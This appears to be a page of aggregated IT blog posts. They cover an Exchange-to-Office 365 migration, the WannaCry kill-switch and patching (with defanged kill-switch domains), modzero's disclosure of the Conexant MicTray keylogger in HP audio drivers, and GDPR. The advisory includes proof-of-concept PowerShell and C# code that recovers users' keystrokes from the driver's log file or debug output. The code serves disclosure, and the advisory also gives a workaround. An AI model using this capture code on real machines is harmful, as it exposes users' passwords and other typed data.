Migrating Exchange to Office 365 Exchange Online

This method is recommended if you are going to migrate your on-premises Exchange 2007 to Office 365 (Exchange Online plan) and then retire your on-premises Exchange.

A cutover migration is the simplest way to get all your existing email into Office 365. As the name implies, it’s a cutover from one service to another. Cutover migrations are supported for Exchange 2003, 2007 and 2010, for organizations with fewer than 1000 mailboxes. The process is pretty straightforward; however, be sure to properly test the migration plan before implementing it.

Step 1: Planning

Microsoft has done a great job of providing good quality information for administrators to use when planning the migration to Office 365. It is always recommended to use the Exchange Deployment Assistant as a guide for all migrations. This site is kept up to date and covers most migration scenarios to Office 365.

  1. Open the Exchange Deployment Assistant site.
  2. Once the site is launched, you are presented with three options. Since I am doing a simple cutover migration from Exchange Server 2007, I am going to use the Cloud Only option.
  3. Click Cloud Only.
  4. You are now asked a series of questions on end state goals and existing setup.
  5. Answer all the questions.
  6. Click the Next arrow.
  7. The Exchange Deployment Assistant will generate a step-by-step guide for you to follow. Make sure to read and understand what you are doing.

Step 2: Testing the Existing Setup

Using the guide from the Exchange Deployment Assistant, we need to make sure that our Exchange 2007 infrastructure supports Outlook Anywhere (RPC over HTTP) and Autodiscover. Use the guide to verify the Exchange 2010 setup. Once the setup is verified to be correct, use the Microsoft Remote Connectivity Analyzer to verify Outlook Anywhere (RPC over HTTP). Make sure that you have assigned the correct permissions to the mailboxes that you are migrating.

  1. Open the Microsoft Remote Connectivity Analyzer site.
  2. Select the Outlook Anywhere (RPC over HTTP) test.
  3. Click Next.
  4. Enter all the information that is requested. You will want to verify that you are using Autodiscover to detect server settings.
  5. Enter the Verification code.
  6. Click Perform Test.

Once the test is successful, you can continue to the next step. If it’s successful with warnings, review the warnings and correct them if needed. If the test fails, use the report generated and the guide (Exchange Deployment Assistant) to resolve the issues.

Use the guide and assign the correct permissions to the mailboxes. If you don’t assign the migration account permissions on the mailboxes, they will not migrate.
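As an added example (not from the original post), the following Exchange Management Shell script grants the migration account Full Access on every mailbox and then reports any mailbox where the grant is still missing; CONTOSO\svc-migration is a placeholder for your migration account.

```powershell
# Added example (not from the original post): grant the cutover migration
# account Full Access on every on-premises mailbox and report any mailbox that
# still lacks it. Run in the Exchange Management Shell on the Exchange server.
# CONTOSO\svc-migration is a placeholder; replace it with your migration account.
$MigrationUser = 'CONTOSO\svc-migration'

function Test-FullAccess {
    # Returns $true when a non-deny Full Access entry exists for the user.
    param($Mailbox, [string]$User)
    $aces = Get-MailboxPermission -Identity $Mailbox.Identity |
        Where-Object {
            $_.User.ToString() -eq $User -and
            $_.AccessRights -contains 'FullAccess' -and
            -not $_.Deny
        }
    return [bool]$aces
}

$mailboxes = @(Get-Mailbox -ResultSize Unlimited)
$granted = 0

foreach ($mbx in $mailboxes) {
    if (-not (Test-FullAccess -Mailbox $mbx -User $MigrationUser)) {
        Add-MailboxPermission -Identity $mbx.Identity -User $MigrationUser `
            -AccessRights FullAccess -InheritanceType All | Out-Null
        $granted++
    }
}

# Verification pass: anything still missing must be fixed before the batch is
# created, because mailboxes without this permission are not migrated.
$missing = @()
foreach ($mbx in $mailboxes) {
    if (-not (Test-FullAccess -Mailbox $mbx -User $MigrationUser)) {
        $missing += $mbx.PrimarySmtpAddress.ToString()
    }
}

Write-Host "Mailboxes: $($mailboxes.Count); new grants: $granted; still missing: $($missing.Count)"
if ($missing) {
    Write-Warning "Mailboxes without Full Access for ${MigrationUser}:"
    $missing | ForEach-Object { Write-Warning "  $_" }
}
```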

Step 3: Configure Cutover Migration

  1. Open Internet Explorer.
  2. Log in to the Office 365 Admin Center.
  3. Open the Exchange Admin Center.
  4. Click Migration.
  5. Click the + drop-down menu and select Migrate to Exchange Online.
  6. Select Cutover migration (supported by Exchange Server 2003 and later versions).
  7. Click Next.
  8. Enter the on-premises account credentials (this is the same account that you gave Full Access permissions to on all the mailboxes).
  9. Click Next.

     When configured properly, Autodiscover should resolve the on-premises Exchange server and the RPC proxy server.

  10. Click Next.
  11. Enter a name for the new migration batch.
  12. Click Next.
  13. Select a user to receive a report once the migration is completed. Multiple accounts can be selected. If you are ready to start the migration, choose to automatically start the batch; if you are not ready, select manually start the batch later.
  14. Click New.
  15. The new migration batch is created and its status is set to Syncing.
  16. Depending on the number of accounts and the amount of data, the migration can take some time. Migration details can be viewed by clicking View Details under Mailbox Status, which shows the accounts being provisioned in Office 365 as well as the progress of the sync from Exchange 2007 to Office 365.

Step 4: Completion of the Migration

When all the accounts are provisioned and the sync from Exchange 2007 to Office 365 is completed, you will get a report emailed to you. Once you get the report, you can complete the migration process.

  1. Migrate Public Folders – Microsoft has released a whitepaper for companies that have public folders to migrate to Office 365: Migrating from Exchange Public Folders to Microsoft Office 365.
  2. Assign Office 365 licenses to all the users and make sure all the DNS records are updated and pointed towards the Office 365 services. Details can be found here: http://office.microsoft.com/en-us/office365-suite-help/manually-update-and-configure-desktops-for-office-365-HA104023514.aspx?CTT=1
  3. Once you are comfortable that all the email is migrated to Office 365 and the MX record DNS change has propagated, you can stop the migration batch job.

At this point the migration is complete and the Exchange 2007 server can be retired. Remember, however, that if you are planning a hybrid Exchange deployment you will need this server for future use. In a hybrid deployment there are two options: Exchange Sync Archive only, or Exchange Sync Archive with single sign-on if you are using on-premises AD integrated with Exchange.

Stop WannaCry ransomware from infecting your systems


If you are following the news, by now you might be aware that a security researcher has activated a “Kill Switch” which apparently stopped the WannaCry ransomware from spreading further.

But that’s not true, nor is the threat over yet.

However, the kill switch has only slowed down the infection rate.

Updated: Multiple security researchers have claimed that there are more samples of WannaCry out there, with different ‘kill-switch’ domains and without any kill-switch function, which continue to infect unpatched computers worldwide (find more details here).

So far, over 237,000 computers across 99 countries around the world have been infected, and the infection is still rising even hours after the kill switch was triggered by the 22-year-old British security researcher behind the Twitter handle ‘MalwareTech.’

For those unaware, WannaCry is an insanely fast-spreading ransomware that leverages a Windows SMB exploit to remotely target computers running unpatched or unsupported versions of Windows.

Once a machine is infected, WannaCry also scans for other vulnerable computers connected to the same network, as well as random hosts on the wider Internet, in order to spread quickly.

The SMB exploit, currently being used by WannaCry, has been identified as EternalBlue, a collection of hacking tools allegedly created by the NSA and then subsequently dumped by a hacking group calling itself “The Shadow Brokers” over a month ago.

“If NSA had privately disclosed the flaw used to attack hospitals when they *found* it, not when they lost it, this may not have happened,” NSA whistleblower Edward Snowden says.

Kill-Switch for WannaCry? No, It’s not over yet!


In our previous two articles, we have put together more information about this massive ransomware campaign, explaining how MalwareTech accidentally halted the global spread of WannaCry by registering a domain name hidden in the malware.

hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The above-mentioned domain is what keeps WannaCry propagating and spreading like a worm: as previously explained, if the connection to this domain fails, the SMB worm proceeds to infect the system.

Fortunately, MalwareTech registered the domain in question and created a sinkhole, a tactic researchers use to redirect traffic from infected machines to a system they control (read his latest blog post for more details).

Updated: Matthieu Suiche, a security researcher, has confirmed that he found a new WannaCry variant with a different kill-switch domain, which he registered and redirected to a sinkhole in an effort to slow down the infections.

hxxp://ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com/

The newly discovered WannaCry variant works exactly like the previous variant that wreaked havoc across the world Friday night.

But, if you are thinking that activating the kill switch has completely stopped the infection, then you are mistaken.

The kill-switch feature was in the SMB worm, not in the ransomware module itself. “WannaCrypt ransomware was spread normally long before this and will be long after, what we stopped was the SMB worm variant,” MalwareTech told The Hacker News.

You should know that the kill-switch would not prevent your unpatched PC from getting infected, in the following scenarios:

  • If you receive WannaCry via an email, a malicious torrent, or other vectors (instead of SMB protocol).
  • If by chance your ISP or antivirus or firewall blocks access to the sinkhole domain.
  • If the targeted system requires a proxy to access the Internet, which is a common practice in the majority of corporate networks.
  • If someone makes the sinkhole domain inaccessible for all, such as by using a large-scale DDoS attack.

MalwareTech also confirmed to THN that some “Mirai botnet skids tried to DDoS the [sinkhole] server for lulz,” in order to make it unavailable to the WannaCry SMB exploit, which triggers infection if the connection fails. But “it failed hardcore,” at least for now.

WannaCry 2.0, Ransomware With *NO* Kill-Switch Is On Hunt!


Initially, this part of the story was based on the research of a security researcher who earlier claimed to have samples of a new WannaCry ransomware that comes with no kill-switch function. But for some reason he backed off, so we have removed his references from this story for now.

However, shortly after that, Costin Raiu, the director of the global research and analysis team at Kaspersky Labs, confirmed to us that his team had seen more WannaCry samples on Friday that did not have the kill switch.

“I can confirm we’ve had versions without the kill switch domain connect since yesterday,” Raiu told The Hacker News.

Updated: WannaCry 2.0 is Someone Else’s Work


Raiu from Kaspersky shared some samples his team discovered with Suiche, who analysed them and confirmed that there is a WannaCrypt variant without a kill switch, equipped with the SMB exploit that would help it spread rapidly without disruption.

What’s even worse is that the new WannaCry variant without a kill-switch is believed to have been created by someone else, not the hackers behind the initial WannaCry ransomware.

“The patched version matt described does attempt to spread. It’s a full set which was modified by someone with a hex editor to disable the kill switch,” Raiu told me.

Updated: However, Suiche also confirmed that the modified variant with no kill switch is corrupted, but this doesn’t mean that other hackers and criminals will not come up with a working one.

“Given the high profile of the original attack, it’s going to be no surprise at all to see copycat attacks from others, and perhaps other attempts to infect even more computers from the original WannaCry gang. The message is simple: Patch your computers, harden your defences, run a decent anti-virus, and – for goodness sake – ensure that you have secure backups.” Cyber security expert Graham Cluley told The Hacker News.

Expect a new wave of ransomware attacks, by the initial attackers and by new ones, which will be difficult to stop until all vulnerable systems are patched.

“The next attacks are inevitable, you can simply patch the existing samples with a hex editor and it’ll continue to spread,” Matthew Hickey, a security expert and co-founder of Hacker House told me.

“We will see a number of variants of this attack over the coming weeks and months so it’s important to patch hosts. The worm can be modified to spread other payloads not just WCry and we may see other malware campaigns piggybacking off this sample’s success.”

Even after WannaCry attacks made headlines all over the Internet and Media, there are still hundreds of thousands of unpatched systems out there that are open to the Internet and vulnerable to hacking.

“The worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host,” Microsoft says.

Believe me, the new strain of WannaCry 2.0 malware would not take long to take over another hundred thousand vulnerable systems.

Apply the Windows security patch and stop this ransomware from infecting you or your organization:

https://www.catalog.update.microsoft.com/Search.aspx?q=kb4012598 Download the update for your system and apply it, and if required, deactivate the SMB/ICF file sharing feature on your Windows systems.
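As an added example (not from the original article), the following PowerShell script audits a host for the update the article links (KB4012598) and for SMBv1 exposure, and disables SMBv1 when run elevated with -Remediate; supported Windows versions received MS17-010 under other KB numbers, so the KB list is a placeholder to extend from the bulletin, and the firewall rule name is an assumption.

```powershell
# Added example, not from the original article: check for the MS17-010 update
# the article links (KB4012598) and for SMBv1 exposure; -Remediate disables SMBv1
# and blocks inbound TCP 445. Run from an elevated PowerShell prompt.
param([switch]$Remediate)

# Placeholder list: add the MS17-010 KB number for your Windows version.
$KbIds = @('KB4012598')

# 1. Is one of the expected hotfixes installed?
$installed = Get-HotFix | Where-Object { $KbIds -contains $_.HotFixID }
if ($installed) {
    $ids = ($installed | ForEach-Object { $_.HotFixID }) -join ', '
    Write-Host "MS17-010 hotfix present: $ids"
} else {
    Write-Warning "None of [$($KbIds -join ', ')] is installed; the SMB flaw may be unpatched."
}

# 2. Is the SMBv1 server protocol still enabled?
$smb = Get-SmbServerConfiguration -ErrorAction SilentlyContinue   # Windows 8 / 2012 and later
if ($smb) {
    $smb1Enabled = [bool]$smb.EnableSMB1Protocol
} else {
    # Older systems: LanmanServer SMB1 registry value (missing or non-zero = enabled)
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $val = (Get-ItemProperty -Path $key -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($null -eq $val) -or ($val -ne 0)
}

if ($smb1Enabled) {
    Write-Warning 'SMBv1 is enabled on this host.'
    if ($Remediate) {
        if ($smb) {
            Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        } else {
            Set-ItemProperty -Path $key -Name SMB1 -Value 0 -Type DWord
        }
        Write-Host 'SMBv1 server protocol disabled; a reboot may be required.'
    }
} else {
    Write-Host 'SMBv1 is disabled on this host.'
}

# 3. Is TCP 445 listening? If the host does not need to serve files, block it
#    inbound at the host firewall (the rule name below is an assumption).
$listening = netstat -an | Select-String ':445\s+\S+\s+LISTENING'
if ($listening -and $Remediate) {
    netsh advfirewall firewall add rule name=Block-SMB-445-Inbound dir=in action=block protocol=TCP localport=445 | Out-Null
    Write-Host 'Inbound TCP 445 blocked at the Windows firewall.'
} elseif ($listening) {
    Write-Warning 'TCP 445 is listening; block it inbound if file sharing is not required.'
}
```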

Several HP laptops have a keylogger in their audio driver.

--------------------------------------------------------------- v3 -
modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]
---------------------------------------------------------------------

———————————————————————
1. Timeline
———————————————————————

* 2017-04-28: Vulnerability has been discovered in MicTray64 version
1.0.0.31 / Thu Dec 24 08:35:35 2015
* 2017-04-28: Vendor Conexant contacted (Email)
* 2017-04-29: Higher impact has been discovered in most recent
MicTray64 version 1.0.0.46 / Tue Oct 11 10:56:13 2016
* 2017-04-30: CVE-2017-8360 has been assigned to this vulnerability.
* 2017-05-01: Contacted Hewlett-Packard Enterprise security advisor
with detailed description of the problem.
* 2017-05-02: Contacted vendor Conexant via Twitter
* 2017-05-05: Sent technical information to HPE security contact.
Informed HPE about releasing the advisory on Monday 8th
of May in case we don’t get any feedback on our report.
* 2017-05-05: Received some notes from HPE after sending technical
information. They tried to reach for security folks
at HP Inc. to gain attention.
* 2017-05-11: Release of the advisory

———————————————————————
2. Summary
———————————————————————

Vendor: Conexant Systems, Inc.

Software packages known to be affected:

* Recent and previous (Q2/2017) HP Audiodriver Packages /
Conexant High-Definition (HD) Audio Driver
Version 10.0.931.89 REV: Q PASS: 5
(ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.html)
* Probably other hardware vendors, shipping Conexant hardware and
drivers

Systems known to be affected:

According to HP information in sp79420.html, the following systems
are affected:

* HARDWARE PRODUCT MODEL(S):
HP EliteBook 820 G3 Notebook PC
HP EliteBook 828 G3 Notebook PC
HP EliteBook 840 G3 Notebook PC
HP EliteBook 848 G3 Notebook PC
HP EliteBook 850 G3 Notebook PC
HP ProBook 640 G2 Notebook PC
HP ProBook 650 G2 Notebook PC
HP ProBook 645 G2 Notebook PC
HP ProBook 655 G2 Notebook PC
HP ProBook 450 G3 Notebook PC
HP ProBook 430 G3 Notebook PC
HP ProBook 440 G3 Notebook PC
HP ProBook 446 G3 Notebook PC
HP ProBook 470 G3 Notebook PC
HP ProBook 455 G3 Notebook PC
HP EliteBook 725 G3 Notebook PC
HP EliteBook 745 G3 Notebook PC
HP EliteBook 755 G3 Notebook PC
HP EliteBook 1030 G1 Notebook PC
HP ZBook 15u G3 Mobile Workstation
HP Elite x2 1012 G1 Tablet
HP Elite x2 1012 G1 with Travel Keyboard
HP Elite x2 1012 G1 Advanced Keyboard
HP EliteBook Folio 1040 G3 Notebook PC
HP ZBook 17 G3 Mobile Workstation
HP ZBook 15 G3 Mobile Workstation
HP ZBook Studio G3 Mobile Workstation
HP EliteBook Folio G1 Notebook PC
* OPERATING SYSTEM(S):
Microsoft Windows 10 32
Microsoft Windows 10 64
Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
Microsoft Windows 7 Enterprise 32 Edition
Microsoft Windows 7 Enterprise 64 Edition
Microsoft Windows 7 Home Basic 32 Edition
Microsoft Windows 7 Home Basic 64 Edition
Microsoft Windows 7 Home Premium 32 Edition
Microsoft Windows 7 Home Premium 64 Edition
Microsoft Windows 7 Professional 32 Edition
Microsoft Windows 7 Professional 64 Edition
Microsoft Windows 7 Starter 32 Edition
Microsoft Windows 7 Ultimate 32 Edition
Microsoft Windows 7 Ultimate 64 Edition
Microsoft Windows Embedded Standard 7 32
Microsoft Windows Embedded Standard 7E 32-Bit

CVE-ID: CVE-2017-8360
Severity: High/Medium
Type: Covert Storage Channel
Vendor: Conexant Systems, Inc.
Product: mic tray icon
Version: <= 1.0.0.46
Attack type: Local
Affected Components: Scheduled Task c:\windows\system32\mictray64.exe

———————————————————————
3. Details
———————————————————————

Conexant’s MicTray64.exe is installed with the Conexant audio driver
package and registered as a Microsoft Scheduled Task to run after each
user login. The program monitors all keystrokes made by the user to
capture and react to functions such as microphone mute/unmute
keys/hotkeys. Monitoring of keystrokes is added by implementing a low-
level keyboard input hook [1] function that is installed by calling
SetWindowsHookEx().

In addition to the handling of hotkey/function key strokes, all key-
scancode information [2] is written into a logfile in a world-readable
path (C:\Users\Public\MicTray.log). If the logfile does not exist or
the setting is not yet available in Windows registry, all keystrokes
are passed to the OutputDebugString API, which enables any process in
the current user-context to capture keystrokes without exposing
malicious behavior. Any framework and process with access to the
MapViewOfFile API should be able to silently capture sensitive data by
capturing the user’s keystrokes. In version 10.0.0.31, only
OutputDebugString was used to forward key scancodes and nothing was
written to files. The following pseudocode shows the registration of
the keylogging function handler of MicTray64.exe version 1.0.0.46:

int64 keylogger_enable(bool activate)
{
    [...]
    if ( !keylogger_active )
    {
        [...]
        // 13=WH_KEYBOARD_LL: Installs a hook procedure that
        // monitors low-level keyboard input events. For
        // more information, see the LowLevelKeyboardProc
        // hook procedure.
        hKeyloggerHook = SetWindowsHookExW(
                             13, (HOOKPROC)handle_scancode,
                             hSelf,
                             0);

        if ( hKeyloggerHook )
        {
            keylogger_active = 1;
            return 0;
        }
        [...]
    }
    [...]
}

After registering function handle_scancode() as a handler to
any keystroke made by the user, the following pseudo-code is executed
every time a key is pressed or released:

LRESULT handle_scancode(
    int _in_nCode,
    WPARAM _in_wParam,
    tagKBDLLHOOKSTRUCT *_in_lParam_keystroke)
{
    tagKBDLLHOOKSTRUCT *key_stroke;
    WPARAM wParam;
    int nCode;
    int64 target;
    DWORD is_keyfoo;
    int is_keydown;
    char tmp;
    int64 key_flags;
    int64 key_vk;

    key_stroke = _in_lParam_keystroke;
    wParam = _in_wParam;
    nCode = _in_nCode;

    if ( _in_nCode >= 0 )
    {
        target = (cfg_HotKeyMicScancode >> 8 *
                  (cfg_HotKeyMicScancode_len - cfg_HotKeyMicScancode_len2));
        LODWORD(key_vk) = _in_lParam_keystroke->vkCode;
        LODWORD(key_flags) = _in_lParam_keystroke->flags;
        is_keyfoo = _in_lParam_keystroke->flags & 1;
        is_keydown = ~(key_flags >> 7) & 1;

[*]     send_to_dbglog(
            0x1D,
            L"Mic target 0x%x scancode 0x%x flags 0x%x extra 0x%x vk 0x%x\n",
            target,
            _in_lParam_keystroke->scanCode,
            key_flags,
            _in_lParam_keystroke->dwExtraInfo,
            key_vk);

        conexant_handle_fn_keys(
            cfg_MicMuteScancodeSettings,
            is_keydown,
            key_stroke->scanCode,
            target,
            &cfg_HotKeyMicScancode_len,
            &cfg_HotKeyMicScancode_len2,
            1);

        if ( cfg_MicMuteScancodeSettings & 4 )
            conexant_handle_fn_keys(
                cfg_MicMuteScancodeSettings,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeyMicScancode2 >> 8 *
                 (cfg_HotKeyMicScancode2_len - cfg_HotKeyMicScancode2_len2)),
                &cfg_HotKeyMicScancode2_len,
                &cfg_HotKeyMicScancode2_len2,
                1);

        tmp = cfg_SpkMuteScancodeSettings;

        if ( cfg_SpkMuteScancodeSettings & 8 && is_keyfoo
             || !(cfg_SpkMuteScancodeSettings & 8) )
        {
            conexant_handle_fn_keys(
                cfg_SpkMuteScancodeSettings,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeySpkScancode >> 8 *
                 (cfg_HotKeySpkScancode_len - cfg_HotKeySpkScancode_len2)),
                &dword_1402709C8,
                &dword_1402709CC,
                0);
            tmp = cfg_SpkMuteScancodeSettings;
        }

        if ( tmp & 4 && (tmp & 8 && is_keyfoo || !(tmp & 8)) )
            conexant_handle_fn_keys(
                tmp,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeySpkScancode2 >> 8 *
                 (cfg_HotKeySpkScancode2_len - cfg_HotKeySpkScancode2_len2)),
                &cfg_HotKeySpkScancode2_len,
                &cfg_HotKeySpkScancode2_len2,
                0);
    }
    return CallNextHookEx(hhk, nCode, wParam, key_stroke);
}

The function called at [*] writes every keystroke to a file or
broadcasts it via Microsoft’s Debug Monitor APIs, through store_keystroke():

void store_keystroke(LPCVOID lpBuffer)
{
    WORD *scancode_logline;
    int64 str_len;
    DWORD NumberOfBytesWritten;
    int str_newline;

    scancode_logline = lpBuffer;
    if ( g_write_to_logfile )
    {
        SetFilePointer(g_hFile, 0, 0, 2);    // 2 = FILE_END: append to MicTray.log
        str_len = -1;

        while ( scancode_logline[str_len++ + 1] != 0 )
            ;

        WriteFile(
            g_hFile,
            scancode_logline,
            2 * str_len,
            &NumberOfBytesWritten,
            0);

        str_newline = '\n\0\r';
        WriteFile(g_hFile, &str_newline, 4, &NumberOfBytesWritten, 0);
    }
    else
    {
        OutputDebugStringW(lpBuffer);
    }
}

This issue leads to a high risk of leaking sensitive user input to any
person or process that is able to read files in
C:\Users\Public\MicTray.log or call MapViewOfFile(). Investigators
with access to the unencrypted file-system might be able to recover
sensitive data of historic key-logs as well. Users are not aware that
every keystroke made while entering sensitive information – such as
passphrases or passwords for local or remote systems – is captured by
Conexant and exposed to any process and framework with access to the
file-system or MapViewOfFile API.
Additionally, this information-leak via Covert Storage Channel
enables malware authors to capture keystrokes without taking the risk
of being classified as malicious task by AV heuristics.

It is not recommended to provide information on keystrokes to
arbitrary processes by writing keystrokes to disk or by using
OutputDebugStringW() for debugging purposes.

———————————————————————
4. Impact
———————————————————————

Any process that is running in the current user-session and therefore
able to monitor debug messages, can capture keystrokes made by the
user. Processes are thus able to record sensitive data such as
passwords, without performing suspicious activities that may trigger
AV vendor heuristics. Furthermore, any process running on the system
by any user is able to access all keystrokes made by the user via
file-system access. It is not known if log-data is submitted to
Conexant at any time, or why all key presses are logged at all.

———————————————————————
5. Proof of concept exploit
———————————————————————

A proof-of-concept can be implemented by using PowerShell to
parse MicTray.log:

$filename = "c:\users\public\MicTray.log"

[System.IO.FileStream] $fs = [System.IO.File]::Open(
    $filename,
    [System.IO.FileMode]::Open,
    [System.IO.FileAccess]::Read,
    [System.IO.FileShare]::ReadWrite)

[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(
    $fs,
    [Text.UTF8Encoding]::UNICODE)

$el = 0

while($el -lt 2) {

    $line = $fr.ReadLine()

    # handle broken newlines in log...
    if([string]::IsNullOrEmpty($line)) {
        $el++
    } else {
        $el=0
    }

    $mc = [regex]::Match($line,
        "MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$")
    $r = $mc.Groups[2].Value

    if(-Not [string]::IsNullOrEmpty($r)) {
        $i = [convert]::ToInt32($r, 16)
        $c = [convert]::ToChar($i)

        if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }

        write-host -NoNewLine $("{0}" -f $c)
    }
}

However, if no logfile is written, it is also possible to obtain
keystrokes by just following Microsoft’s DbMon Debug Monitor [3]
approach of capturing strings passed to OutputDebugString [4]:

namespace mod0_dbgview
{
    class Program
    {
        public static void Main(string[] args)
        {
            DebugMonitor.Start();
            DebugMonitor.OnOutputDebugString += new
                OnOutputDebugStringHandler(OnOutputDebugString);
            Console.WriteLine("Press 'Enter' to exit.");
            Console.ReadLine();
            DebugMonitor.Stop();
        }

        // version 1.0.0.46
        private static void OnOutputDebugString(int pid, string text)
        {
            char sep = ' ';
            char nl = '\n';
            text = text.TrimEnd(nl);
            string[] items = text.Split(sep);
            if (items[7].Equals("Mic"))
            {
                int c_int = Convert.ToInt32(items[17], 16);
                if (c_int == 0xd)
                {
                    Console.WriteLine();
                }
                else if (Convert.ToInt32(items[13], 16) == 0x00)
                    Console.Write("{0}", (char)(c_int & 0xff));
            }
        }

        // version 1.0.0.31
        private static void OnOutputDebugString_v31(
            int pid,
            string text)
        {
            char sep = ' ';
            string[] items = text.Split(sep);
            if (items[0].Equals("Mic"))
            {
                int c_int = Convert.ToInt32(items[10], 16);
                if (c_int == 0xd)
                {
                    Console.WriteLine();
                }
                else if(Convert.ToInt32(items[6], 16) == 0x00)
                    Console.Write("{0}", (char)(c_int & 0xff));
            }
        }
    }
}

Any framework that provides an API down to ReadFile() or Microsoft’s
MapViewOfFile() should be able to capture keystrokes captured by
Conexant’s audio driver utils. By using Microsoft Windows Sysinternals
Dbgview [5], keystrokes can be visualized easily, if they are not
written to file.

———————————————————————
6. Workaround
———————————————————————

Delete the MicTray executables and logfiles. Deleting the Scheduled
Task is not sufficient, as Conexant’s Windows service CxMonSvc will
otherwise launch MicTray. The executable is located at
c:\Windows\System32\MicTray64.exe; the MicTray logfile is located at
C:\Users\Public\MicTray.log.
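As an added example (not modzero's code), the following PowerShell script audits a host for the components named in this advisory and, when run elevated with -Remove, applies the workaround above; because the advisory does not give the scheduled task's name, the task is found by the executable its action runs.

```powershell
# Added example (not modzero's code): audit a host for the MicTray components
# described in MZ-17-01 and, with -Remove, apply the workaround: stop and delete
# the executable and the log file, disable the scheduled task and CxMonSvc.
# Run from an elevated PowerShell prompt.
param([switch]$Remove)

$exe = 'C:\Windows\System32\MicTray64.exe'
$log = 'C:\Users\Public\MicTray.log'
$findings = @()

if (Test-Path $exe) {
    $ver = (Get-Item $exe).VersionInfo.FileVersion
    $findings += "MicTray64.exe present (file version $ver)"
}
if (Test-Path $log) {
    $size = (Get-Item $log).Length
    $findings += "MicTray.log present ($size bytes); treat its contents as sensitive"
}

# Scheduled task(s) whose action launches MicTray; schtasks also exists on Windows 7.
# Task name is not given in the advisory, so match on the 'Task To Run' column.
$tasks = @(schtasks /Query /FO CSV /V | ConvertFrom-Csv |
    Where-Object { $_.'Task To Run' -match 'MicTray' })
foreach ($t in $tasks) { $findings += "Scheduled task runs MicTray: $($t.TaskName)" }

$svc = Get-Service -Name CxMonSvc -ErrorAction SilentlyContinue
if ($svc) { $findings += "Service CxMonSvc is $($svc.Status) (relaunches MicTray)" }

if (-not $findings) { Write-Host 'No MicTray components found.'; return }
$findings | ForEach-Object { Write-Warning $_ }

if ($Remove) {
    foreach ($t in $tasks) {
        schtasks /Change /TN "$($t.TaskName)" /Disable | Out-Null
    }
    if ($svc) {
        Stop-Service -Name CxMonSvc -Force -ErrorAction SilentlyContinue
        Set-Service -Name CxMonSvc -StartupType Disabled
    }
    Get-Process -Name MicTray64 -ErrorAction SilentlyContinue | Stop-Process -Force
    Remove-Item -Path $exe, $log -Force -ErrorAction SilentlyContinue
    Write-Host 'Workaround applied; reinstalling the driver package will bring MicTray back.'
}
```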

———————————————————————
7. Fix
———————————————————————

It is not known to modzero if a security fix is available.

———————————————————————
8. References
———————————————————————

[1] “LowLevelKeyboardProc callback function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
[2] KBDLLHOOKSTRUCT structure –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644967(v=vs.85).aspx
[3] “DbMon: Implements a Debug Monitor” –
https://msdn.microsoft.com/en-us/library/aa242171(v=vs.60).aspx
[4] “MSDN/OutputDebugString function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
[5] “Microsoft Windows Sysinternals DebugView” –
https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
[6] “modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]” –
https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt

SHA256 sums:

———————————————————————
9. Credits
———————————————————————

* Thorsten Schroeder

———————————————————————
10. About modzero
———————————————————————

The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.

https://www.modzero.ch
contact@modzero.ch

The General Data Protection Regulation (GDPR) for Office 365

In May 2018, a European privacy law is due to take effect that will require big changes, and potentially significant investments, by organizations all over the world—including Microsoft and our customers.

Known as the General Data Protection Regulation (GDPR), the law imposes new rules on companies, government agencies, non-profits, and other organizations that offer goods and services to people in the European Union (EU), or that collect and analyze data tied to EU residents. The GDPR applies no matter where you are located.

Microsoft believes the GDPR represents an important step forward for individual privacy rights. It gives EU residents more control over their “personal data” (which is precisely defined by the GDPR). The GDPR also seeks to ensure personal data is protected no matter where it is sent, processed, or stored. The law updates European privacy regulations for the first time in more than two decades, bringing them more in line with current technologies, and increases the uniformity of privacy regulations across the EU’s member states.

The GDPR is also a complex regulation that may require vast changes in how you gather and manage data. Microsoft has a long history of helping our customers comply with complex regulations. When it comes to preparing for the GDPR, we’ve got your back.

Supporting your journey to compliance with the GDPR

We want to help you focus on your core business while efficiently preparing for the GDPR. Our goal is to streamline your compliance with the GDPR through smart technology, innovation, and collaboration.

Microsoft products and services are available today to help you meet the GDPR requirements, and we are investing in additional features and functionality. Through our cloud services and on-premises solutions we’ll help you locate and catalog the personal data in your systems, build a more secure environment, simplify your management and monitoring of personal data, and give you the tools and resources you need to meet the GDPR reporting and assessment requirements.

We will share what we learn on our journey to compliance to make yours easier. We will show you how our existing enterprise products and services—such as Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server and Azure SQL Database, and Windows 10—can jumpstart that journey today.

Where do I start?

The GDPR contains many requirements about how you collect, store and use personal information. This means not only how you identify and secure the personal data in your systems, but also how you accommodate new transparency requirements, how you detect and report personal data breaches, and how you train privacy personnel and employees.

